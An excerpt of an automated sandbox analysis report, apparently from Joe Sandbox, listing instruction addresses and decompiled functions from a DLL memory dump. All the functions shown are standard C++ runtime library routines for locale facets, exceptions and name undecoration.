                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F230
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F23A
                          • int.LIBCPMT ref: 6E20F251
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E20F274
                          • std::_Facet_Register.LIBCPMT ref: 6E20F28B
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F2AB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F2C9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID: lm,n
                          • API String ID: 438560357-2206263333
                          • Opcode ID: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
                          • Instruction ID: 1c104a9268f021b353bb8231c8ab20f96f0e8e10f81fcfdd2560fc16708d8229
                          • Opcode Fuzzy Hash: 9b5121115db1075f85e04779bc2fd0571f1b2e1df53b73329ef1a14ecf9c44ce
                          • Instruction Fuzzy Hash: 5F11067990051E8FCF00DBE0C894AEEB77BAF84B15F240908E4206B3D0DF749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E22735D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E22735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6E225A6C( &_v12, E6E22614D(0));
				_t33 =  *0x6e2c7218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6E226052( &_v12, 1);
					goto L8;
				} else {
					 *0x6e2c7218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6E225FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6E225EFB( &_v12, E6E229DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6E225FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}













                          0x6e22736f
                          0x6e227374
                          0x6e22737a
                          0x6e22737e
                          0x6e2273d3
                          0x00000000
                          0x6e227380
                          0x6e227384
                          0x6e22738a
                          0x6e22738d
                          0x6e2273c7
                          0x00000000
                          0x6e22738f
                          0x6e227390
                          0x6e227393
                          0x6e2273b8
                          0x00000000
                          0x6e227395
                          0x6e227398
                          0x6e2273d8
                          0x6e2273e0
                          0x6e2273e5
                          0x6e2273eb
                          0x6e2273f0
                          0x6e2273f4
                          0x6e22739a
                          0x6e22739a
                          0x6e22739d
                          0x6e2273a1
                          0x6e2273a4
                          0x6e2273a9
                          0x6e2273a9
                          0x6e227398
                          0x6e227393
                          0x6e22738d

                          APIs
                          • UnDecorator::UScore.LIBVCRUNTIME ref: 6E227365
                          • DName::DName.LIBVCRUNTIME ref: 6E22736F
                            • Part of subcall function 6E225A6C: DName::doPchar.LIBVCRUNTIME ref: 6E225A93
                          • UnDecorator::getScopedName.LIBVCRUNTIME ref: 6E2273AE
                          • DName::operator+=.LIBVCRUNTIME ref: 6E2273B8
                          • DName::operator+=.LIBCMT ref: 6E2273C7
                          • DName::operator+=.LIBCMT ref: 6E2273D3
                          • DName::operator+=.LIBCMT ref: 6E2273E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                          • String ID: void
                          • API String ID: 1480779885-3531332078
                          • Opcode ID: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
                          • Instruction ID: 16cc9319238a68ac39c54c6150795e32d24dcece4c89620ef7e106bd7ad328bf
                          • Opcode Fuzzy Hash: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
                          • Instruction Fuzzy Hash: EE11A13585420D9FDB04DFE4C8A5FECBBBABB01709F0084A8F8019B2D5DBB0AA45CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t902 - 0x14, 0);
				_t861 =  *0x6e2c6db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6E1E161C(0x6e2c6d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6E2066BA(_t902 - 0x14);
					return E6E220075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6E210DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t902 - 0x20);
							E6E223D74(_t902 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t840, _t861, 0x14);
							E6E206653(_t902 - 0x14, 0);
							_t862 =  *0x6e2c6dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6E1E161C(0x6e2c6b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6E2066BA(_t902 - 0x14);
								return E6E220075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6E210E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t902 - 0x20);
										E6E223D74(_t902 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t637, _t841, _t862, 0x14);
										E6E206653(_t902 - 0x14, 0);
										_t863 =  *0x6e2c6de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6E1E161C(0x6e2c6d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6E2066BA(_t902 - 0x14);
											return E6E220075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6E210EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t902 - 0x20);
													E6E223D74(_t902 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t637, _t842, _t863, 0x14);
													E6E206653(_t902 - 0x14, 0);
													_t864 =  *0x6e2c6db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6E1E161C(0x6e2c6d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6E2066BA(_t902 - 0x14);
														return E6E220075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6E210F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t902 - 0x20);
																E6E223D74(_t902 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t637, _t843, _t864, 0x14);
																E6E206653(_t902 - 0x14, 0);
																_t865 =  *0x6e2c6dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6E1E161C(0x6e2c6d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6E2066BA(_t902 - 0x14);
																	return E6E220075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6E210F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t902 - 0x20);
																			E6E223D74(_t902 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t637, _t844, _t865, 0x14);
																			E6E206653(_t902 - 0x14, 0);
																			_t866 =  *0x6e2c6dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6E1E161C(0x6e2c6d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6E2066BA(_t902 - 0x14);
																				return E6E220075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6E210FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t902 - 0x20);
																						E6E223D74(_t902 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t637, _t845, _t866, 0x14);
																						E6E206653(_t902 - 0x14, 0);
																						_t867 =  *0x6e2c6df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6E1E161C(0x6e2c6d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6E2066BA(_t902 - 0x14);
																							return E6E220075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6E211057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t902 - 0x20);
																									E6E223D74(_t902 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t637, _t846, _t867, 0x14);
																									E6E206653(_t902 - 0x14, 0);
																									_t868 =  *0x6e2c6dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6E1E161C(0x6e2c6d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6E2066BA(_t902 - 0x14);
																										return E6E220075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6E2110BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t902 - 0x20);
																												E6E223D74(_t902 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t637, _t847, _t868, 0x14);
																												E6E206653(_t902 - 0x14, 0);
																												_t869 =  *0x6e2c6df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6E1E161C(0x6e2c6da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6E2066BA(_t902 - 0x14);
																													return E6E220075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6E211127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t902 - 0x20);
																															E6E223D74(_t902 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t637, _t848, _t869, 0x14);
																															E6E206653(_t902 - 0x14, 0);
																															_t870 =  *0x6e2c6df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6E1E161C(0x6e2c6da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6E1E171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6E2066BA(_t902 - 0x14);
																																return E6E220075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6E2111AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t902 - 0x20);
																																		E6E223D74(_t902 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t637, _t849, _t870, 0x14);
																																		E6E206653(_t902 - 0x14, 0);
																																		_t871 =  *0x6e2c6dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6E1E161C(0x6e2c6d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
